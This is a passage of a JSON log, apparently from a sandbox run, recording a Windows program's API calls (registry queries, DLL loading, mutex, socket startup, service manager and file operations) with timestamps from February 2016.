"2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": 
"registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": 
"2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, 
{"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,323", "api": "NtQueryInformationFile"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtCreateMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,323", "api": "NtOpenMutant"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": 
"RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "socket", "timestamp": "2016-02-16 17:41:35,323", "api": "WSAStartup"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrLoadDll"}, 
{"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,323", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,323", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,333", "api": "NtQueryInformationFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,333", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegCreateKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": 
"RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenServiceW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,333", "api": "RegQueryValueExA"}, {"category": "services", "timestamp": "2016-02-16 17:41:35,333", "api": "OpenSCManagerA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,343", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,343", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,343", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": 
"2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,343", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,343", "api": 